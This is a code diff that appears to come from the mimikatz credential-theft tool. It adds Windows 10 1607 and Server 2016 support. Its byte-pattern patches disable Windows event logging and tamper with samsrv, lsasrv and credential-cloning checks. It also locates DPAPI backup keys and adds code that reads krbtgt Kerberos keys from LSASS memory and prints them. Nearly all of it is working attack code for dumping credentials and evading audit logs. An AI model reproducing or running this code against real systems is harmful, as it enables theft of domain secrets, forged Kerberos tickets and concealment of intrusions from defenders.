BYTE PTRN_WIN6_Channel__ActualProcessEvent[] = {0xff, 0xf7, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
|
||||
BYTE PTRN_WI10_Channel__ActualProcessEvent[] = {0x48, 0x8b, 0xc4, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x40, 0xc8, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x58, 0x08};
|
||||
BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
|
||||
|
||||
BYTE PATC_WNT6_Channel__ActualProcessEvent[] = {0xc3};
|
||||
BYTE PATC_WNT5_PerformWriteRequest[] = {0x45, 0x33, 0xed, 0xc3};
|
||||
@ -27,7 +28,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_PerformWriteRequest), PTRN_WNT5_PerformWriteRequest}, {sizeof(PATC_WNT5_PerformWriteRequest), PATC_WNT5_PerformWriteRequest}, {-10}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_Channel__ActualProcessEvent), PTRN_WN60_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_Channel__ActualProcessEvent), PTRN_WIN6_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d};
|
||||
@ -36,6 +38,7 @@ BYTE PTRN_WN61_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0x
|
||||
BYTE PTRN_WN62_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x75, 0x0c};
|
||||
BYTE PTRN_WN63_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0xf9, 0x8b};
|
||||
BYTE PTRN_WN64_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x89, 0x44, 0x24, 0x10, 0x53, 0x56, 0x57, 0xa1};
|
||||
BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x8b, 0xd9, 0x8b, 0x4d, 0x08, 0xe8};
|
||||
|
||||
BYTE PATC_WNT5_PerformWriteRequest[] = {0x33, 0xc0, 0xc2, 0x04, 0x00};
|
||||
BYTE PATC_WNO8_Channel__ActualProcessEvent[] = {0xc2, 0x04, 0x00};
|
||||
@ -47,7 +50,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_Channel__ActualProcessEvent), PTRN_WN61_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_Channel__ActualProcessEvent), PTRN_WN62_Channel__ActualProcessEvent}, {sizeof(PATC_WIN8_Channel__ActualProcessEvent), PATC_WIN8_Channel__ActualProcessEvent}, {-33}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-32}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
};
|
||||
#endif
|
||||
|
||||
|
||||
@ -962,6 +962,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
};
|
||||
#endif
|
||||
PCWCHAR szSamSrv = L"samsrv.dll", szLsaSrv = L"lsasrv.dll", szNtDll = L"ntdll.dll", szKernel32 = L"kernel32.dll", szAdvapi32 = L"advapi32.dll";
|
||||
|
||||
@ -206,19 +206,23 @@ BYTE PTRN_6NOP[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
BYTE PTRN_WN52_LoopBackCheck[] = {0x48, 0x8b, 0xd8, 0x48, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x07, 0x01, 0x00, 0x00, 0x00, 0x83};
|
||||
BYTE PTRN_WN61_LoopBackCheck[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x44, 0x89, 0x33, 0x33, 0xdb, 0x39};
|
||||
BYTE PTRN_WN81_LoopBackCheck[] = {0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x45, 0x89, 0x34, 0x24, 0x83};
|
||||
BYTE PTRN_WN10_1607_LoopBackCheck[] = {0x44, 0x8d, 0x70, 0x01, 0x45, 0x89, 0x34, 0x24, 0x39, 0x05};
|
||||
KULL_M_PATCH_GENERIC LoopBackCheckReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WN52_LoopBackCheck), PTRN_WN52_LoopBackCheck}, {sizeof(PTRN_JMP_NEAR), PTRN_JMP_NEAR}, {24}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LoopBackCheck), PTRN_WN61_LoopBackCheck}, {sizeof(PTRN_JMP_NEAR), PTRN_JMP_NEAR}, {28}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN81_LoopBackCheck), PTRN_WN81_LoopBackCheck}, {sizeof(PTRN_JMP), PTRN_JMP}, {17}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_LoopBackCheck), PTRN_WN10_1607_LoopBackCheck}, {sizeof(PTRN_JMP), PTRN_JMP}, {14}},
|
||||
};
|
||||
// ModSetAttsHelperPreProcess:SysModReservedAtt
|
||||
BYTE PTRN_WN52_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0xc8, 0x00, 0x00, 0x00};
|
||||
BYTE PTRN_WN61_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0x78, 0x01, 0x00, 0x00, 0x4d, 0x8b, 0x6d, 0x00};
|
||||
BYTE PTRN_WN81_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0xb8, 0x00, 0x00, 0x00};
|
||||
BYTE PTRN_WN10_1607_SysModReservedAtt[] = {0x8b, 0xbc, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x8c, 0x24, 0xc8, 0x00, 0x00, 0x00};
|
||||
KULL_M_PATCH_GENERIC SysModReservedAttReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WN52_SysModReservedAtt), PTRN_WN52_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_SysModReservedAtt), PTRN_WN61_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN81_SysModReservedAtt), PTRN_WN81_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_SysModReservedAtt), PTRN_WN10_1607_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
#endif
|
||||
|
||||
@ -375,6 +375,7 @@ BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x47, 0x04, 0x83, 0xf8, 0x01, 0
|
||||
BYTE PTRN_WN60_CredpCloneCredential[] = {0x44, 0x8b, 0xea, 0x41, 0x83, 0xe5, 0x01, 0x75};
|
||||
BYTE PTRN_WN62_CredpCloneCredential[] = {0x44, 0x8b, 0xfa, 0x41, 0x83, 0xe7, 0x01, 0x75};
|
||||
BYTE PTRN_WN63_CredpCloneCredential[] = {0x45, 0x8b, 0xf8, 0x44, 0x23, 0xfa};
|
||||
BYTE PTRN_WN10_1607_CredpCloneCredential[] = {0x45, 0x8b, 0xe0, 0x41, 0x83, 0xe4, 0x01, 0x75};
|
||||
BYTE PATC_WNT5_CredpCloneCredentialJmpShort[] = {0x90, 0xe9};
|
||||
BYTE PATC_WALL_CredpCloneCredentialJmpShort[] = {0xeb};
|
||||
BYTE PATC_WN64_CredpCloneCredentialJmpShort[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
@ -384,6 +385,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_CredpCloneCredential), PTRN_WN10_1607_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};
|
||||
|
||||
@ -460,6 +460,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
|
||||
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
{
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_64 tmpCred64, *creds64;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5;
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
@ -467,7 +468,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
if(addr)
|
||||
{
|
||||
kprintf(L"\n%s krbtgt: ", prefix);
|
||||
if(cLsass.osContext.MajorVersion < 6)
|
||||
if(cLsass.osContext.MajorVersion < 6) // TODO: a field offset table
|
||||
{
|
||||
aLocal.address = &tmpCred5;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_5) - sizeof(KIWI_KRBTGT_CREDENTIAL_5)))
|
||||
@ -496,7 +497,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_BUILD_10_1607)
|
||||
{
|
||||
aLocal.address = &tmpCred6;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6)))
|
||||
@ -525,6 +526,35 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
aLocal.address = &tmpCred64;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_64) - sizeof(KIWI_KRBTGT_CREDENTIAL_64)))
|
||||
{
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);
|
||||
if(creds64 = (PKIWI_KRBTGT_CREDENTIALS_64) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
aLocal.address = creds64;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds))
|
||||
{
|
||||
kprintf(L"%u credentials\n", creds64->cbCred);
|
||||
for(i = 0; i < creds64->cbCred; i++)
|
||||
{
|
||||
kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds64->credentials[i].type)));
|
||||
aLsass.address = creds64->credentials[i].key;
|
||||
if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds64->credentials[i].size)))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds64->credentials[i].size)))
|
||||
kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds64->credentials[i].size), 0);
|
||||
LocalFree(aLocal.address);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
LocalFree(creds64);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -761,23 +791,27 @@ void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB
|
||||
}
|
||||
|
||||
BYTE PTRN_WALL_BackupKey[] = {0xb9, 0x02, 0x00, 0x00, 0x00, 0x89, 0x05};
|
||||
BYTE PTRN_W2K16_BackupKey[] = {0xb9, 0x02, 0x00, 0x00, 0x00, 0xe8};
|
||||
KULL_M_PATCH_GENERIC BackupKeyReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 37, 44}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 40, 47}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 33, 40}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 30, 37}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W2K16_BackupKey), PTRN_W2K16_BackupKey}, {0, NULL}, {-10, 24, 31}},
|
||||
};
|
||||
BYTE PTRN_W2K3_BackupKeyCompat[] = {0x45, 0x33, 0xc9, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xe8};
|
||||
BYTE PTRN_W2K8_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
BYTE PTRN_W2K8R2_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
BYTE PTRN_W2K12_BackupKeyCompat[] = {0x85, 0xc0, 0x74, 0x21, 0x4c, 0x8d, 0x05};
|
||||
BYTE PTRN_W2K12R2_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0xe8};
|
||||
BYTE PTRN_W2K16_BackupKeyCompat[] = {0x85, 0xc0, 0x75, 0x1e, 0xe8};
|
||||
KULL_M_PATCH_GENERIC BackupKeyReferencesCompat[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_W2K3_BackupKeyCompat), PTRN_W2K3_BackupKeyCompat}, {0, NULL}, {-4, -18, -11}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_W2K8_BackupKeyCompat), PTRN_W2K8_BackupKeyCompat}, {0, NULL}, {-4, 26, 33}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_W2K8R2_BackupKeyCompat), PTRN_W2K8R2_BackupKeyCompat}, {0, NULL}, {-4, 20, 27}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_W2K12_BackupKeyCompat), PTRN_W2K12_BackupKeyCompat}, {0, NULL}, {21, 7, 14}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_W2K12R2_BackupKeyCompat), PTRN_W2K12R2_BackupKeyCompat}, {0, NULL}, {-4, 17, 24}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W2K16_BackupKeyCompat), PTRN_W2K16_BackupKeyCompat}, {0, NULL}, {-9, -23, -16}},
|
||||
};
|
||||
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
||||
@ -100,6 +100,25 @@ typedef struct _KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA {
|
||||
ULONG nbPackages;
|
||||
} KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA, *PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
PVOID flags;
|
||||
PVOID unk2; //
|
||||
PVOID type;
|
||||
PVOID size;
|
||||
PVOID key;
|
||||
} KIWI_KRBTGT_CREDENTIAL_64, *PKIWI_KRBTGT_CREDENTIAL_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
|
||||
DWORD unk0_ver;
|
||||
DWORD cbCred;
|
||||
PVOID unk1;
|
||||
LSA_UNICODE_STRING salt;
|
||||
PVOID unk2;
|
||||
KIWI_KRBTGT_CREDENTIAL_64 credentials[ANYSIZE_ARRAY];
|
||||
} KIWI_KRBTGT_CREDENTIALS_64, *PKIWI_KRBTGT_CREDENTIALS_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
|
||||
@ -512,6 +512,25 @@ typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
PVOID flags;
|
||||
PVOID unk2; //
|
||||
PVOID type;
|
||||
PVOID size;
|
||||
PVOID key;
|
||||
} KIWI_KRBTGT_CREDENTIAL_64, *PKIWI_KRBTGT_CREDENTIAL_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
|
||||
DWORD unk0_ver;
|
||||
DWORD cbCred;
|
||||
PVOID unk1;
|
||||
LSA_UNICODE_STRING salt;
|
||||
PVOID unk2;
|
||||
KIWI_KRBTGT_CREDENTIAL_64 credentials[ANYSIZE_ARRAY];
|
||||
} KIWI_KRBTGT_CREDENTIALS_64, *PKIWI_KRBTGT_CREDENTIALS_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
|
||||
@ -467,33 +467,63 @@ VOID kuhl_m_sekurlsa_genericEncLsaIsoOutput(PENC_LSAISO_DATA_BLOB blob, DWORD si
|
||||
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)
|
||||
{
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_64 tmpCred64, *creds64;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
PVOID buffer;
|
||||
|
||||
if(addr)
|
||||
{
|
||||
dprintf("\n%s krbtgt: ", prefix);
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred6, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6), NULL))
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_10_1607)
|
||||
{
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6);
|
||||
if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds))
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred6, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6), NULL))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, creds6, sizeForCreds, NULL))
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6);
|
||||
if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
dprintf("%u credentials\n", creds6->cbCred);
|
||||
for(i = 0; i < creds6->cbCred; i++)
|
||||
if(ReadMemory((ULONG_PTR) addr, creds6, sizeForCreds, NULL))
|
||||
{
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size)))
|
||||
dprintf("%u credentials\n", creds6->cbCred);
|
||||
for(i = 0; i < creds6->cbCred; i++)
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds6->credentials[i].key, buffer, PtrToUlong(creds6->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds6->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds6->credentials[i].key, buffer, PtrToUlong(creds6->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds6->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
LocalFree(creds6);
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred64, sizeof(KIWI_KRBTGT_CREDENTIALS_64) - sizeof(KIWI_KRBTGT_CREDENTIAL_64), NULL))
|
||||
{
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);
|
||||
if(creds64 = (PKIWI_KRBTGT_CREDENTIALS_64) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) addr, creds64, sizeForCreds, NULL))
|
||||
{
|
||||
dprintf("%u credentials\n", creds64->cbCred);
|
||||
for(i = 0; i < creds64->cbCred; i++)
|
||||
{
|
||||
dprintf("\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds64->credentials[i].type)));
|
||||
if(buffer = LocalAlloc(LPTR, PtrToUlong(creds64->credentials[i].size)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) creds64->credentials[i].key, buffer, PtrToUlong(creds64->credentials[i].size), NULL))
|
||||
kull_m_string_dprintf_hex(buffer, PtrToUlong(creds64->credentials[i].size), 0);
|
||||
LocalFree(buffer);
|
||||
}
|
||||
dprintf("\n");
|
||||
}
|
||||
}
|
||||
LocalFree(creds64);
|
||||
}
|
||||
LocalFree(creds6);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Loading…
Reference in New Issue
Block a user